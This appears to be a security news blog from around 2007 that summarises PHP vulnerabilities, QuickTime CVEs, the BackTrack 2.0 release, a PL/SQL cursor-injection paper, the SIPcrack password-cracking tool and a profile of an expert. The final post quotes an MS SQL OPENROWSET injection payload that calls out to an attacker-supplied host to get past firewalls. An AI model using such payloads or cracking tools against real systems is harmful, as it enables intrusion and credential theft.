Another day , another PHP bug discovered by the Hardened-PHP team .

14. PHP substr_compare() Information Leak Vulnerability An integer overflow in the substr_compare() function allows reading arbitrary heap memory.

Share This

If you enjoyed this post, make sure you subscribe to my RSS feed!

BackTrack is the most Top rated linux live distribution focused on penetration testing. The long-awaited (~5 months) tool has reached it’s Version 2.0 final stage. There are a lot of changes since the last Version as mentioned on the Changelog. To name just a few :

•  

We included a bunch of new drivers into the latest release and where able to make the desired packet injection functionalities to a wider audience.

By supporting the new ALFA USB hi-power devices there is now a great USB wireless dongle available which allows us to connect an external antenna and use BackTrack to attack even on my Intel Macbook or VMware

Even broadcom 43xx based cards should be able to inject - a bit sloppy but should work.

The following drivers are now on our CD:

• madwifi-ng (Patched for Injection)
• hostap (Patched for Injection)
• prism54 (Patched for Injection)
• bcm43xx (Patched for Injection)
• rtl8180 (Patched for Injection)
• rtl8187 (Patched for Injection)
• ipw2200 (Patched for Injection)
• rt2570 (ASPj’s Drivers)
• rt2500
• rt61
• rt73
• ipw2100
• ipw3945
• acx100
• zd1211rw

• •  

Get yours at http://www.remote-exploit.org

Share This

If you enjoyed this post, make sure you subscribe to my RSS feed!

Today seems to be a bugs / vulnerability day .Two more PHP vulnerabilities exposed in Day 5 of the Month of PHP Bugs project raising the bug count to 13:

12. PHP 4 Ovrimos Extension Multiple Vulnerabilities An ASCIIZ character embedded in application/x-www-form-urlencoded POST data terminates the data in the eyes of mod_security, which results in a trivial way to bypass its rules
13. PHP 4 Ovrimos Extension Multiple Vulnerabilities The Ovrimos extension shipped with PHP 4 considers arguments as direct memory pointers. This allows direct memory access which leads to arbitrary code execution.

Share This

If you enjoyed this post, make sure you subscribe to my RSS feed!

The release of QuickTime 7.1.5 brings excelent news : 7 critical vulnerabilities have been patched. The impact of most of them are described as may lead to an application crash or arbitrary code execution

• CVE-ID: CVE-2007-0711 Impact: Viewing a maliciously-crafted 3GP file may lead to an application crash or arbitrary code execution
• CVE-ID: CVE-2007-0712 Impact: Viewing a maliciously-crafted MIDI file may lead to an application crash or arbitrary code execution
• CVE-ID: CVE-2007-0713 Impact: Viewing a maliciously-crafted Quicktime movie file may lead to an application crash or arbitrary code execution
• CVE-ID: CVE-2007-0714 Impact: Viewing a maliciously-crafted Quicktime movie file may lead to an application crash or arbitrary code execution
• CVE-ID: CVE-2007-0715 Impact: Viewing a maliciously-crafted PICT file may lead to an application crash or arbitrary code execution
• CVE-ID: CVE-2007-0716 Impact: Opening a maliciously-crafted QTIF file may lead to an application crash or arbitrary code execution
• CVE-ID: CVE-2007-0717 Impact: Opening a maliciously-crafted QTIF file may lead to an application crash or arbitrary code execution
• CVE-ID: CVE-2007-0718 Impact: Opening a maliciously-crafted QTIF file may lead to an application crash or arbitrary code execution
• CVE-ID: CVE-2006-4965 Impact: Viewing a maliciously-crafted QuickTime movie file or QTL file may lead to arbitrary JavaScript code execution in context of the local domain

Read the release notes

Share This

If you enjoyed this post, make sure you subscribe to my RSS feed!

Two more PHP vulnerabilities exposed in Day 4 of the Month of PHP Bugs project raising the bug count to 11:

10. PHP php_binary Session Deserialization Information Leak Vulnerability Malformed session data in php_binary format might leak a portion of heap data into PHP variables.
11. PHP WDDX Session Deserialization Information Leak Vulnerability Numerical keys in session data in WDDX format might leak an arbitrary portion of stack data into PHP variables.

Share This

If you enjoyed this post, make sure you subscribe to my RSS feed!

Cursor Injection - A New Method for Exploiting PL/SQL Injection and Potential Defences David Litchfield, NGSSoftware , released this paper which describes a new method whereby an attacker, seeking to exploit a SQL injection flaw in an Oracle database server, may do so without the need to create an auxiliary inject function in order to execute arbitrary SQL. This is achieved by injecting a pre-compiled cursor into vulnerable PL/SQL objects. The driving force behind this research is to show that all SQL injection flaws can be fully exploited without any system privilege other than CREATE SESSION and accordingly the risk should never be "marked down".

On occasion Oracle in their alerts state that the ability to create a procedure or a function is required for an attacker to be able to exploit a flaw. For example, DB02 in the October 2006 Critical Patch Update was for a vulnerability in the SDO_DROP_USER_BEFORE trigger. In the Risk Matrix section of the alert it states that an attacker must have the CREATE PROCEDURE privilege to exploit the flaw. As we will see this is not the case.

Read Cursor Injection - A New Method for Exploiting PL/SQL Injection and Potential Defences

Share This

If you enjoyed this post, make sure you subscribe to my RSS feed!

Short description: SIPcrack is a SIP login sniffer/cracker that contains 2 programs: sipdump to capture the digest authentication and sipcrack to bruteforce the hash using a wordlist or standard input. SIPcrack is able to capture and bruteforce registrar and proxy challenges and should work for all clients/server. Links: http://www.codito.de http://www.remote-exploit.org/codes_sipcrack.html

Share This

If you enjoyed this post, make sure you subscribe to my RSS feed!

Day 3 of the Month of PHP Bugs project brings one more PHP vulnerability raising the bug count to 9:

9. PHP wddx_deserialize() String Append Buffer Overflow Vulnerability Malformed WDDX data might trigger an exploitable buffer overflow that was introduced by a pseudo security fix.

Share This

If you enjoyed this post, make sure you subscribe to my RSS feed!

Anurag Agarwal released the third article from the series of mini biographies called Reflection which so far presented Amit Klein and RSnake ; this time, the security superstar was Jeremiah Grossman. He is a man of ideas and thinks differently from others, Anurag writes. His blog is amongst the most followed blogs on information security. A must follow figure in web application security to stay current with emerging threats and news concludes Anurag.

Jeremiah Grossman is an expert in webappsec and is a CTO and a co-founder of Whitehat Security. He is also a founding member of Web Application Security Consortium.

Next Reflection will feature Ivan Ristic, the man behind mod_security. Full article : Reflection on Jeremiah Grossman

Share This

If you enjoyed this post, make sure you subscribe to my RSS feed!

I just read a great article published by Application Security Inc. which gave me some good ideas for my future SQL Injection attacks. It starts like this :

select * from OPENROWSET(’SQLoledb’, ‘uid=sa;pwd=;Network=DBMSSOCN;Address=hackersip,80;’, ’select * from table’)

Well, having the SQL server call home to your machine is cool enough (bye bye firewall) , but the paper’s author, Cesar Cerrudo went a step forward . These are the main topics covered by his paper :

• Detection of sql injection vulnerabilities
• Retrieving results from sql injection
• Elevating privileges
• Uploading files
• Getting into the internal network
• Port scanning
• Recommendations

I highly recommend Manipulating Microsoft SQL Server Using SQL Injection

Share This

If you enjoyed this post, make sure you subscribe to my RSS feed!